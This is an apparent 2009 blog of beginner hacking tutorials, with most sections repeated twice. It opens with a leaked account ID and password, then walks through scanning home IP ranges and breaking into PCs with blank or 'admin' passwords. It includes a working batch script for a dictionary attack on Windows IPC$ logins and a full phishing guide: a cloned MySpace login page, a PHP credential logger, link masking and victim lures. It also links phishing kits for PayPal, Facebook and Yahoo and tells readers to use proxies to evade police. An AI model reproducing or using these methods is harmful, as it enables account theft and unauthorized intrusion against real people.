accountid= 9640819
password= HaUULC3s
Expiration date: Wed, 1. Jul 2009
enjoy and for saying thanks contact me at tushar.kesarwani2@gmail.com
Monday, June 22, 2009
Saturday, June 20, 2009
scaning + getting into someones computer
scaning + getting into someones computer
I KNOW NOW ALL OF U HV TURNED IN 2 RED .,anyway let's start scanning
rapidshare.com/files/143057612/Scannzxsxzxing.rar
first of all download dis ...
it conatain
angry ip scanner,n map nd some more scanning tools.
it is d final stage of information gathering of an attacker.
in scanning a hacker/attacker looks for these stuffs.
specifc ip address
operating system
service running on d system.
u or any1 can skip footprinting bt not scanning.
in scanning we look 4 d open ports nd we look 4 d vulnerabilities existing in our target.
before of writing about scanning i would like 2 clear u d concept of ping.
knowing d actual meaning of ping is very much essential 4 doing scanning.
PING---->PING, i m nt telling u ping's actual definition ,i m just giving u d idea of ping
open run ,type cmd ,hit enter nd nw type ping nd hit enter.
nw u vl see der many things just read dhem,well nw moov 2 ping again.
suppose dt we r pinging 2 any website then it means we r sending some data 2 dt website.
suppose dt u want 2 check ,ur freind is online or nt?
then simpally ping his ip address.i mean suppose dt if his ip address is
192.255.29.32 then
open command prompt[command prompat=run->cmd>enter]
nd type
ping 192.255.29.32
if nw u vl see dt 4 data packets has been sent 2 ur freind ,nw u vl see der written loss.
actually if ur freind is online then he gets ur ping nd if he is nt then u vl see der 100% loss.
in short ping is sending data 2 a specific address nd it can be done 2 check wether dt person/website is conneted 2 internet or not.
hoping u ppl hv got d idea of ping .nw proceed 2 scanning.
freinds
nw it's d time 2 be active,quick,sharp nd hardworking.
anyway
i am again telling u d objectives of scanning.these r
to detect wether d system is connected 2 internet or nt?
to discover vch ports r active/running?
to discover d operating system running on d target system[known as fingerprinting]
to discover d ip address nd services running on d system.
let's start scanning now.
bcoz nw every1 of u know pinging some1 there4 1 step of scanning u can do urself nd dt is checking a system/person is connected 2 internet or nt?suppose dt u want2 ping google or orkut or ur freind then use dis blue syantax in d command prompt
ping ip adress
or
ping google.com
oki.
nw ,in modern era der r thousands of tools available 4 scanning,der r thousands of softwares bt we will be using only 2 tools,one is angry ip scanner nd d second 1 is n map.
these 2 tools r enough 4 ur purpose,wen we will learn sniffing we will use some wifi scanners nd lan scanners bt here in dis topic we will learn using they 2.
ANGRY IP SCANNER--->an ip scanner 4 windows,it can scan alive ips in a range ,a very beautiful nd good tool 4 scanning.actually dis software do nothing
but pings all d ip addresses nd gives u information.
USING ANGRY IP SCANNER--->[ThEORY PART]
all u hv 2 do is 2 specify a ip range vch u vant 2 scan for.
suppose dt up ip address is
192.167.23.23
then it is sure dt d connections vchr nearer 2 ur home ,they r having d ip address assigned vd
192.167.23.01 to 192.127.23.99[plz look d last digits of ip address]
nw 4 knowing vch 1 of these ip address r live nd working,all u hv 2 do is 2 just scan d range,
dis software can scan any range.
USING ANGRY IP SCANNER--->[PRACTICAL PART]
using ip scanner is very easy.
simpally give d range u want 2 search 4 nd search
d addresses where u can see d green light.right click der nd watch details.after of right click u can see many more things ...have a look at all of dem.
hping2,firewalk opuput
these r also some tools 4 scanning purpose bt 4get them
der r many other tools also like superscan,ipscanner,megaping,floppyscan.
well,floppyscan is d best scanning tool but it is 4 linux.it finds open ports .
freinds nw d other purpose of scanning is also 2 get vch operating system has been loaded on ur target machine,see,each operating system has its own unique vulnerabilities der4 knowing dt vch ohperating system is ur victime is using,is very necessary.
getting this information is called fingerprinting,
IN WINDOWS
based operating systems u can do fingerprinting
by using N-MAP
.
N MAP-->it is 4 finding open ports in a system or in ur victim's computer.
it does many type of scanning nd undoughtly it is d most beautiful tool 4 scanning.
nw u ppl hv learnt using angry ip scanner.wen u vl use it u vl see red coloured nd green coloured blinking lights.green clr is alive ip ,alive ip means they ip addressess are active dis moment.'
it is d biggest truth of hacking dt a person can be hacked only in d case wen he is online[brut force attack->exeption]
nw u ppl find dt he is online.
<-------------N-MAP------------------------->
IT is d most beautiful tool 4 windows 4 scanning purpose.plz dont mind its small size.it is d perfect tool conatining more than 20 type applications.
we will be learning all of dem.
b4 of learning n map plz be cool.
u must know many things b4 using it .let's learn de.
sorry,1 thing i forgot 2 write,der is nothing in d scanning arena vch it cann't do.it is d most lovely scanning tool of all d good hackers.
SOME OF D SCANNING WAYS USED BY N MAP--->
X MAS TREE->d attacker checks 4 tcp services by sending "X mas-tree"packets.these r only name .take these easy.
SYN STEALTh->IT IS half open scanning.
WINDOW SCAN->IT can detect open ports.
-------------> SCANNING WAYS OF NAMP FINIShED 4 NW<-------------------
----------->TCP COMMUNICATION FLAGS<------------------
SYNChRONIZE->>;known as syn,it is used 2 initiate a connection b/w hosts
ACKNOWLEDGEMENT-->also called ack.it is used in establishing a connetion b/w hosts.
FINISh-->kNOWN AS fin,it says 2 remore connetion 2 do no more transmission.
RESET--->known as rst,it is used 2 reset a connection.
--------->CONCEPT OF 3 WAY hANDShAKE<---------------------
suppose dt JhON IS chatting vd his girlfreind selina,then this communication vl folow this methode.. john--->[sends syn named packet 2 selina]
nw
selina--->[sends syn-acn named pack 2 john]
nw
john----->[sends ack named packet 2 selina]
nd nw d communication b/w dem is established.
this is 3way handshake.
hacking thru dis concept vl come after of some time.dis moment memorize dis concept.
INSTALLING N MAP---->
OPEN namp software nd install,while installing it vl say dt winpcan is missing nd it vl show error ,ignore dt nd install it ,after of installing go in
C>>programfiles>>n map>winpcap
open winpcan,here u vl see 2 .exe files,install any1 of dem.
nw ur n map is fully installed.
------------>USING N MAP<-------------
first of all get any alive ip address 4m angry ip scanner,nw put it in n map search box nd search 4. u can scn 4 many things .mind it n map provides u all type of scanning,keep checking different boxes nd scan 4 every1. freinds nw hack is going 2 be,u ppl r going 2 hack many computer after of just 5 minutes ..first of all i vl give here a practical item then whole concept . be prepared 2 do ur first hack in 2 oder's computer .
------->HACKING IN 2 A COMPUTER<------------
well, it is very easy. frist of all search 4 any ip range, get d alive ip list. go on any alive ip address. right click der open computer>in explorer
in present era,in india most of d airtel users [nd other internet service users also ]does nt fix a password 4 conneting derself 2 d internet .de leave it blank nd here due 2 der dis mistake u can hack in 2 der computer.
if after of
open computer>inexplorer
it asks 4 password then give password
"admin"
vdout quotes
nd see,if u get entry in his computer,it is nt necessary 2 enter in all d computers,bt by dis technique u can enter in some of d computers.
all dis tute is based on angry ip scanner.no use of n map.
----->HACKING IN A COMPUTER[ADVANCED]<--------------------
WELL d technique is same as d previous 1 . only der r few chnages. suppose dt u want 2 hack a specified p.c. then get dt person ip address nw scan in n map 4 dt ip address nd look 4 open ports. if port no. 80 nd 21 r open then get dis ip adress in angry ip scanner nd try 2 enter in his computer using default password admin apart of it in angry ip scanner wen u right click u see der open computer nd many options i.e.telnet,ftp,http try 2 connect vd every1 of dem. if ur luck is vd u then u can enter in his computer. scaning is finished 4 nw. u enterd in a person's computer ,this thing is also a part of enumeration. anyway nw i vl start d topic. HACKING E MAIL IDS[INCLUDING ORKUT] scanning finished 4 nw.
----------->SUMMARY OF D ChAPTER<-----------------
[1]use angry ip scanner 2 scan various ip range
[2]use n map 2 do all type of scanning.
[3]scanning is done 2 find information about open ports,running operating system on system nd many othre things
[4]we can enter in oder person computer using angry ip scanner. link download angry ip scanner ,n map nd some odr scanners
rapidshare.com/files/143057612/Scannzxsxzxing.rar
----------------------->SCANING FINIShED<----------------------
I KNOW NOW ALL OF U HV TURNED IN 2 RED .,anyway let's start scanning
rapidshare.com/files/143057612/Scannzxsxzxing.rar
first of all download dis ...
it conatain
angry ip scanner,n map nd some more scanning tools.
it is d final stage of information gathering of an attacker.
in scanning a hacker/attacker looks for these stuffs.
specifc ip address
operating system
service running on d system.
u or any1 can skip footprinting bt not scanning.
in scanning we look 4 d open ports nd we look 4 d vulnerabilities existing in our target.
before of writing about scanning i would like 2 clear u d concept of ping.
knowing d actual meaning of ping is very much essential 4 doing scanning.
PING---->PING, i m nt telling u ping's actual definition ,i m just giving u d idea of ping
open run ,type cmd ,hit enter nd nw type ping nd hit enter.
nw u vl see der many things just read dhem,well nw moov 2 ping again.
suppose dt we r pinging 2 any website then it means we r sending some data 2 dt website.
suppose dt u want 2 check ,ur freind is online or nt?
then simpally ping his ip address.i mean suppose dt if his ip address is
192.255.29.32 then
open command prompt[command prompat=run->cmd>enter]
nd type
ping 192.255.29.32
if nw u vl see dt 4 data packets has been sent 2 ur freind ,nw u vl see der written loss.
actually if ur freind is online then he gets ur ping nd if he is nt then u vl see der 100% loss.
in short ping is sending data 2 a specific address nd it can be done 2 check wether dt person/website is conneted 2 internet or not.
hoping u ppl hv got d idea of ping .nw proceed 2 scanning.
freinds
nw it's d time 2 be active,quick,sharp nd hardworking.
anyway
i am again telling u d objectives of scanning.these r
to detect wether d system is connected 2 internet or nt?
to discover vch ports r active/running?
to discover d operating system running on d target system[known as fingerprinting]
to discover d ip address nd services running on d system.
let's start scanning now.
bcoz nw every1 of u know pinging some1 there4 1 step of scanning u can do urself nd dt is checking a system/person is connected 2 internet or nt?suppose dt u want2 ping google or orkut or ur freind then use dis blue syantax in d command prompt
ping ip adress
or
ping google.com
oki.
nw ,in modern era der r thousands of tools available 4 scanning,der r thousands of softwares bt we will be using only 2 tools,one is angry ip scanner nd d second 1 is n map.
these 2 tools r enough 4 ur purpose,wen we will learn sniffing we will use some wifi scanners nd lan scanners bt here in dis topic we will learn using they 2.
ANGRY IP SCANNER--->an ip scanner 4 windows,it can scan alive ips in a range ,a very beautiful nd good tool 4 scanning.actually dis software do nothing
but pings all d ip addresses nd gives u information.
USING ANGRY IP SCANNER--->[ThEORY PART]
all u hv 2 do is 2 specify a ip range vch u vant 2 scan for.
suppose dt up ip address is
192.167.23.23
then it is sure dt d connections vchr nearer 2 ur home ,they r having d ip address assigned vd
192.167.23.01 to 192.127.23.99[plz look d last digits of ip address]
nw 4 knowing vch 1 of these ip address r live nd working,all u hv 2 do is 2 just scan d range,
dis software can scan any range.
USING ANGRY IP SCANNER--->[PRACTICAL PART]
using ip scanner is very easy.
simpally give d range u want 2 search 4 nd search
d addresses where u can see d green light.right click der nd watch details.after of right click u can see many more things ...have a look at all of dem.
hping2,firewalk opuput
these r also some tools 4 scanning purpose bt 4get them
der r many other tools also like superscan,ipscanner,megaping,floppyscan.
well,floppyscan is d best scanning tool but it is 4 linux.it finds open ports .
freinds nw d other purpose of scanning is also 2 get vch operating system has been loaded on ur target machine,see,each operating system has its own unique vulnerabilities der4 knowing dt vch ohperating system is ur victime is using,is very necessary.
getting this information is called fingerprinting,
IN WINDOWS
based operating systems u can do fingerprinting
by using N-MAP
.
N MAP-->it is 4 finding open ports in a system or in ur victim's computer.
it does many type of scanning nd undoughtly it is d most beautiful tool 4 scanning.
nw u ppl hv learnt using angry ip scanner.wen u vl use it u vl see red coloured nd green coloured blinking lights.green clr is alive ip ,alive ip means they ip addressess are active dis moment.'
it is d biggest truth of hacking dt a person can be hacked only in d case wen he is online[brut force attack->exeption]
nw u ppl find dt he is online.
<-------------N-MAP------------------------->
IT is d most beautiful tool 4 windows 4 scanning purpose.plz dont mind its small size.it is d perfect tool conatining more than 20 type applications.
we will be learning all of dem.
b4 of learning n map plz be cool.
u must know many things b4 using it .let's learn de.
sorry,1 thing i forgot 2 write,der is nothing in d scanning arena vch it cann't do.it is d most lovely scanning tool of all d good hackers.
SOME OF D SCANNING WAYS USED BY N MAP--->
X MAS TREE->d attacker checks 4 tcp services by sending "X mas-tree"packets.these r only name .take these easy.
SYN STEALTh->IT IS half open scanning.
WINDOW SCAN->IT can detect open ports.
-------------> SCANNING WAYS OF NAMP FINIShED 4 NW<-------------------
----------->TCP COMMUNICATION FLAGS<------------------
SYNChRONIZE->>;known as syn,it is used 2 initiate a connection b/w hosts
ACKNOWLEDGEMENT-->also called ack.it is used in establishing a connetion b/w hosts.
FINISh-->kNOWN AS fin,it says 2 remore connetion 2 do no more transmission.
RESET--->known as rst,it is used 2 reset a connection.
--------->CONCEPT OF 3 WAY hANDShAKE<---------------------
suppose dt JhON IS chatting vd his girlfreind selina,then this communication vl folow this methode.. john--->[sends syn named packet 2 selina]
nw
selina--->[sends syn-acn named pack 2 john]
nw
john----->[sends ack named packet 2 selina]
nd nw d communication b/w dem is established.
this is 3way handshake.
hacking thru dis concept vl come after of some time.dis moment memorize dis concept.
INSTALLING N MAP---->
OPEN namp software nd install,while installing it vl say dt winpcan is missing nd it vl show error ,ignore dt nd install it ,after of installing go in
C>>programfiles>>n map>winpcap
open winpcan,here u vl see 2 .exe files,install any1 of dem.
nw ur n map is fully installed.
------------>USING N MAP<-------------
first of all get any alive ip address 4m angry ip scanner,nw put it in n map search box nd search 4. u can scn 4 many things .mind it n map provides u all type of scanning,keep checking different boxes nd scan 4 every1. freinds nw hack is going 2 be,u ppl r going 2 hack many computer after of just 5 minutes ..first of all i vl give here a practical item then whole concept . be prepared 2 do ur first hack in 2 oder's computer .
------->HACKING IN 2 A COMPUTER<------------
well, it is very easy. frist of all search 4 any ip range, get d alive ip list. go on any alive ip address. right click der open computer>in explorer
in present era,in india most of d airtel users [nd other internet service users also ]does nt fix a password 4 conneting derself 2 d internet .de leave it blank nd here due 2 der dis mistake u can hack in 2 der computer.
if after of
open computer>inexplorer
it asks 4 password then give password
"admin"
vdout quotes
nd see,if u get entry in his computer,it is nt necessary 2 enter in all d computers,bt by dis technique u can enter in some of d computers.
all dis tute is based on angry ip scanner.no use of n map.
----->HACKING IN A COMPUTER[ADVANCED]<--------------------
WELL d technique is same as d previous 1 . only der r few chnages. suppose dt u want 2 hack a specified p.c. then get dt person ip address nw scan in n map 4 dt ip address nd look 4 open ports. if port no. 80 nd 21 r open then get dis ip adress in angry ip scanner nd try 2 enter in his computer using default password admin apart of it in angry ip scanner wen u right click u see der open computer nd many options i.e.telnet,ftp,http try 2 connect vd every1 of dem. if ur luck is vd u then u can enter in his computer. scaning is finished 4 nw. u enterd in a person's computer ,this thing is also a part of enumeration. anyway nw i vl start d topic. HACKING E MAIL IDS[INCLUDING ORKUT] scanning finished 4 nw.
----------->SUMMARY OF D ChAPTER<-----------------
[1]use angry ip scanner 2 scan various ip range
[2]use n map 2 do all type of scanning.
[3]scanning is done 2 find information about open ports,running operating system on system nd many othre things
[4]we can enter in oder person computer using angry ip scanner. link download angry ip scanner ,n map nd some odr scanners
rapidshare.com/files/143057612/Scannzxsxzxing.rar
----------------------->SCANING FINIShED<----------------------
HACK any system in LAN
HACK any system in LAN
LAN Remote user - Dictionary Attack Create and use this Batch file
to launch a Dictionary attack and find the Windows logon Credentials in a LAN.
You need a Dictionary text file to proceed further to launch this attack successfully.
Just Follow the steps below,
1. Open up a Notepad file.
2. Copy and paste the below code and save it as a Batch file with .bat extension.
@echo off
if “%1″==”" goto fin
if “%2″==”" goto fin
del logfile.txt
FOR /F “tokens=1″ %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^
echo %time% %date% >> output.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo *****Done*****
3. Make sure that you have a Dictionary password Text file in the same location where you are going to execute this program. ( Name should be passlist.txt )
4. Now goto the command prompt and then execute this program from there, along with the Target compters IP address or Hostname and the Valid Username.
The Syntax should be like this,…
C:\>LANbrute.bat 192.169.21.02 Administrator
Where,
LANbrute.bat - This is the Name of the batch file that resides in the C Drive.
192.169.21.02 - IP Address of the Target Computer.
Administrator - Victim Account that you want to crack.
5. This program will start launching Dictionary Attack against the Adminstrator account on the Mahine 192.168.21.02, by using the passwords from the file passlist.txt and will not stop until it finds a right match.
6. If the right password was found, then it will save it in a text file named ‘output.txt’ on the same directory
LAN Remote user - Dictionary Attack Create and use this Batch file
to launch a Dictionary attack and find the Windows logon Credentials in a LAN.
You need a Dictionary text file to proceed further to launch this attack successfully.
Just Follow the steps below,
1. Open up a Notepad file.
2. Copy and paste the below code and save it as a Batch file with .bat extension.
@echo off
if “%1″==”" goto fin
if “%2″==”" goto fin
del logfile.txt
FOR /F “tokens=1″ %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^
echo %time% %date% >> output.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo *****Done*****
3. Make sure that you have a Dictionary password Text file in the same location where you are going to execute this program. ( Name should be passlist.txt )
4. Now goto the command prompt and then execute this program from there, along with the Target compters IP address or Hostname and the Valid Username.
The Syntax should be like this,…
C:\>LANbrute.bat 192.169.21.02 Administrator
Where,
LANbrute.bat - This is the Name of the batch file that resides in the C Drive.
192.169.21.02 - IP Address of the Target Computer.
Administrator - Victim Account that you want to crack.
5. This program will start launching Dictionary Attack against the Adminstrator account on the Mahine 192.168.21.02, by using the passwords from the file passlist.txt and will not stop until it finds a right match.
6. If the right password was found, then it will save it in a text file named ‘output.txt’ on the same directory
phishing
now hacking starts
first i will tell u about the core of hacking
see hacking is nothing but a bundle of teckniques
here i will try to touch probably all the teckniques which i know
one of the most important tecknique is phishing
here i will teach each and everything regarding phishing
phishing
1. Intro
There are couple of other phishing tutorials around the net, but some people seem to have
problems understanding them. So I'll try to be as simple as possible.
This phishing tutorial is written for newbs,
and if you have problems understanding it,
then you need to get some beginner level computer knowledge first.
-This article was written for educational purpose only. I'm not responsible for any illegal activity that you may commit.
2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes
the username and the password to a file,
or does whatever you want.
3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use justfree.com. Go to justfree.com and sign up for a free account.
In this tutorial we will make a phishing site for myspace
(the procedure is equivalent for most of the sites). While not signed in myspace,
open anyone's profile and click on his picture. That will lead you to Myspace's
login page that has the red box with"You Must Be Logged-In to do That!"
just above your login form. Now, click File>Save Page As, and save the
myspace page to your Desktop. Open your saved page with any text
editor(notepad, wordpad etc.).
Select all of the text(the source code), and copy it create 'New File',
and paste the Myspace's source code there. Name the file 'index.php'(without the ''),
and save it.
Now you have made a page equal to Myspace. Everything on that page will have the same
function as if it were on the original site. The link to your phish site will be
'www.xxx.justfree.com/index.php' - where 'xxx' is the name of your account
(you can name it anyhow).
But there is a little problem. When someone enters his username and password and press
login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging them
into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code
(for the sign in button, search button, etc.). We need to find the 'action=some link'
that refers to the Login button.
After some searching, we find the part like this:
form action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
method="post" id="LoginForm" name="aspnetForm">
and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"'
refers to the login button.
Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="login.php"
and save the file.
Formerly, when you click the login button it would take the values in the
username and password boxes,
and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process'
file.
Now when you click the login button it will take the values in the username in password
boxes, and execute the functions in the 'login.php' file on your site
(which doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that
writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code in it:
?>?>?> $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The function of login.php is simple. It opens a file named 'passwords.txt'(and creates
it if it doesn't already exist) and enter the informations
there(the username and password).
Congratulations! You have a phisher!
The link to your phish site is:
http://xxx.justfree.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.justfree.com/passwords.txt
Or you may access it from your account.
Note that you can choose whatever names you like for index.php, login.php and passwords.txt. but the .php and .txt must stay the same.
4. How to trick people to fall for it.
There are billions of ways how to do it, your creativity is your limit.
Most common way is to make an email similar to the admin,
and sending them some report with a link to log in the site(your phish site).
Ofcourse you will mask the link.
How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled,
you're doing this:
Code:
[url=YourPhishSiteLink]TheOriginalSiteLink[/url]
If you're making the phisher for myspace, and want to get random ppl to it,
you can simply make some hot chick account and put some hot pic that will
lead to your phish site when clicked. So when they click the
lusty image, they will be led to your phish site telling them they need to
log in to see that.
Like this:
Code:
[url=YourPhishSiteLink][img]link of the image[/img][/url]
When sending emails see for the option 'hyperlink', and it's
self explainable once you see it.
There are many other ways, and as I said, your creativity is the limit.
5. Outro
I hope that this tutorial was helpful and simple enough. It explains how to make a
phisher, and how it works. Although is written for Myspace, the procedure is
equivalent for almost every other login site(for hotmail is different).
After this, it's up to you to explore, experiment and dive in the world of social
engineering.
the most important function of phisher is getting premmium accounts i have got premmium accs of many sites
including rapidshare and megaupload
phishing steps for hacking rapidshare accs
phishing is not difficult, if u follow my core steps ....
HERE I WILL POST METHORD TO HACK rapidshare ACC(s) ONLY
STEP 1:- creat acc on www.justfree.com
STEP 2:- DOWNLOAD http://rapidshare.com/files/240286481/rapidshare.com_best_.rar and extract
STEP 3:- upload the phishing files(in your justfree acc) of those websites whose passwords u want to hack
STEP 4:- now go to your justfree acc. u will see the file named index. click on that file
new page will apear. copy its link from address bar
STEP 5:- now go to google and search list of url shortners . u will find many
web sites. open any one . paste your link (of step 4 ) there and get shortened link
STEP 6:- nw u r done. just go to any download forums or orkut community and post some good
software details with the above link. whenever any premium user will download that
software he will put login and password there and u will get that in your justfree
acc (txt file )[/YELLOW]
IF U R CLEVER ENOUGH U CAN GO PHISHING OF REST OF THE SIDES BY YOURSELF
IF PROBLEM PERSISTS ASK HERE .......!!!!!!
BEING MY STUDENT, TILL NOW U ALL HAVE GOT THE KNOWLEDGE OF PHISHING, SO NOW I M GIVING U,
THE PHISHING PAGES OF MANY POPULAR WEB SITES
facebook phisher:-
http://rapidshare.com/files/240288443/FaceBook.rar
AIM phisher:-
http://rapidshare.com/files/240293121/AIM.rar
eBay phisher:-
http://rapidshare.com/files/240293192/eBay.rar
Hi5 phisher:-
http://rapidshare.com/files/240293261/Hi5.rar
hotmail phisher:-
http://rapidshare.com/files/240293321/Hotmail.rar
paypal phisher:-
http://rapidshare.com/files/240293396/PayPal.rar
photoBucket phisher:-
http://rapidshare.com/files/240293501/PhotoBucket.rar
runescape phisher:-
http://rapidshare.com/files/240293593/Runescape.rar
yahoo phisher:-
http://rapidshare.com/files/240293699/Yahoo.rar
after phishing keyloger comes
people have got accs through keylogger but personally i don't follow this methord
so i will not explain this method
first i will tell u about the core of hacking
see hacking is nothing but a bundle of teckniques
here i will try to touch probably all the teckniques which i know
one of the most important tecknique is phishing
here i will teach each and everything regarding phishing
phishing
1. Intro
There are couple of other phishing tutorials around the net, but some people seem to have
problems understanding them. So I'll try to be as simple as possible.
This phishing tutorial is written for newbs,
and if you have problems understanding it,
then you need to get some beginner level computer knowledge first.
-This article was written for educational purpose only. I'm not responsible for any illegal activity that you may commit.
2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes
the username and the password to a file,
or does whatever you want.
3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use justfree.com. Go to justfree.com and sign up for a free account.
In this tutorial we will make a phishing site for myspace
(the procedure is equivalent for most of the sites). While not signed in myspace,
open anyone's profile and click on his picture. That will lead you to Myspace's
login page that has the red box with"You Must Be Logged-In to do That!"
just above your login form. Now, click File>Save Page As, and save the
myspace page to your Desktop. Open your saved page with any text
editor(notepad, wordpad etc.).
Select all of the text(the source code), and copy it create 'New File',
and paste the Myspace's source code there. Name the file 'index.php'(without the ''),
and save it.
Now you have made a page equal to Myspace. Everything on that page will have the same
function as if it were on the original site. The link to your phish site will be
'www.xxx.justfree.com/index.php' - where 'xxx' is the name of your account
(you can name it anyhow).
But there is a little problem. When someone enters his username and password and press
login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging them
into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code
(for the sign in button, search button, etc.). We need to find the 'action=some link'
that refers to the Login button.
After some searching, we find the part like this:
form action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
method="post" id="LoginForm" name="aspnetForm">
and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"'
refers to the login button.
Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="login.php"
and save the file.
Formerly, when you click the login button it would take the values in the
username and password boxes,
and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process'
file.
Now when you click the login button it will take the values in the username in password
boxes, and execute the functions in the 'login.php' file on your site
(which doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that
writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code in it:
?>?>?> $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The function of login.php is simple. It opens a file named 'passwords.txt'(and creates
it if it doesn't already exist) and enter the informations
there(the username and password).
Congratulations! You have a phisher!
The link to your phish site is:
http://xxx.justfree.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.justfree.com/passwords.txt
Or you may access it from your account.
Note that you can choose whatever names you like for index.php, login.php and passwords.txt. but the .php and .txt must stay the same.
4. How to trick people to fall for it.
There are billions of ways how to do it, your creativity is your limit.
Most common way is to make an email similar to the admin,
and sending them some report with a link to log in the site(your phish site).
Ofcourse you will mask the link.
How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled,
you're doing this:
Code:
[url=YourPhishSiteLink]TheOriginalSiteLink[/url]
If you're making the phisher for myspace, and want to get random ppl to it,
you can simply make some hot chick account and put some hot pic that will
lead to your phish site when clicked. So when they click the
lusty image, they will be led to your phish site telling them they need to
log in to see that.
Like this:
Code:
[url=YourPhishSiteLink][img]link of the image[/img][/url]
When sending emails see for the option 'hyperlink', and it's
self explainable once you see it.
There are many other ways, and as I said, your creativity is the limit.
5. Outro
I hope that this tutorial was helpful and simple enough. It explains how to make a
phisher, and how it works. Although is written for Myspace, the procedure is
equivalent for almost every other login site(for hotmail is different).
After this, it's up to you to explore, experiment and dive in the world of social
engineering.
the most important function of phisher is getting premmium accounts i have got premmium accs of many sites
including rapidshare and megaupload
phishing steps for hacking rapidshare accs
phishing is not difficult, if u follow my core steps ....
HERE I WILL POST METHORD TO HACK rapidshare ACC(s) ONLY
STEP 1:- creat acc on www.justfree.com
STEP 2:- DOWNLOAD http://rapidshare.com/files/240286481/rapidshare.com_best_.rar and extract
STEP 3:- upload the phishing files(in your justfree acc) of those websites whose passwords u want to hack
STEP 4:- now go to your justfree acc. u will see the file named index. click on that file
new page will apear. copy its link from address bar
STEP 5:- now go to google and search list of url shortners . u will find many
web sites. open any one . paste your link (of step 4 ) there and get shortened link
STEP 6:- nw u r done. just go to any download forums or orkut community and post some good
software details with the above link. whenever any premium user will download that
software he will put login and password there and u will get that in your justfree
acc (txt file )[/YELLOW]
IF U R CLEVER ENOUGH U CAN GO PHISHING OF REST OF THE SIDES BY YOURSELF
IF PROBLEM PERSISTS ASK HERE .......!!!!!!
BEING MY STUDENT, TILL NOW U ALL HAVE GOT THE KNOWLEDGE OF PHISHING, SO NOW I M GIVING U,
THE PHISHING PAGES OF MANY POPULAR WEB SITES
facebook phisher:-
http://rapidshare.com/files/240288443/FaceBook.rar
AIM phisher:-
http://rapidshare.com/files/240293121/AIM.rar
eBay phisher:-
http://rapidshare.com/files/240293192/eBay.rar
Hi5 phisher:-
http://rapidshare.com/files/240293261/Hi5.rar
hotmail phisher:-
http://rapidshare.com/files/240293321/Hotmail.rar
paypal phisher:-
http://rapidshare.com/files/240293396/PayPal.rar
photoBucket phisher:-
http://rapidshare.com/files/240293501/PhotoBucket.rar
runescape phisher:-
http://rapidshare.com/files/240293593/Runescape.rar
yahoo phisher:-
http://rapidshare.com/files/240293699/Yahoo.rar
after phishing keyloger comes
people have got accs through keylogger but personally i don't follow this methord
so i will not explain this method
proxy
now come is proxy
doing proxy
proxy is changing ur ip adress
as i already told u that your ip address is d unique address on vch data r sent 2 you
nw think that if u r doing any wrong work then what will get pollice to you'r hame . it's you'r
ip address ..... so if u tell the web wrong ip address then police will go to any other's ip address
and u will be safe...
we get many benefits from proxy.
[1]we can download multiple files 4m rapidshare
[2]by dis we can bypass a firewall
[3] der r many sites vch allows only one account on 1 ip address,on dose sites we can make multiple ids by dis.
[4]4 being safe while doing cyber hackes,it is very much essential 2 do proxy.
[5]after of doing proxy,we can fool other person very easily.
learning proxy is very imp. bcoz while doing cyber hacks it makes u some safe
lemme tel u something about working of proxy.
U------>SENDING DATA 2 GMAIL------->GMAIL REPLYING 2 U
AFTER OF DOING PROXY THIS THING LOOKS SOMETHING LIKE DIS
U---->PROXY SERVER--->GMAIL SERVER------>PROXY SRVER-->U
NW i think u hv got d idea of proxy
for doing proxy follow these simple steps----->>>>>
AS I TOLD U PREVIOUSLY PROXY IS Changing ur ip address.it is very much easy.
first of al write in google"list of proxy address" or u may search 4 "free proxy server"
nw many links will come.go on any1 of them.
now on that website u vl find many ip address nd port no.s.
these r d adress of proxy servers.now copy any1 of de address.mind it,u hv 2 copy both d things,i mean port no. as well as ip address.
now open ur internet explorer nd go in
tools>internet option>connection>lan setting
go in lan setting,der u vl see 2 blue lines.one is AUTOMATIC CONFIGURATION ND d second one is PROXY SERVER
in proxy server named tab u vl see 4 blocks.2 for ticking nd 2 for giving address.tick both of dem boxes nd in address put d ip adress u copied nd in port no. put d port no. u copied.never forget 2 tick both d boxes .now click o.k.
nw open whatismyip.com
nd u vl see dt ur ip address has been chANged.
in mozilla firefox go here
tools>options>advanced>network>settings
nd in settings put d ip address nd port no.
dis is d same operation vch is carried out in all type of browser.
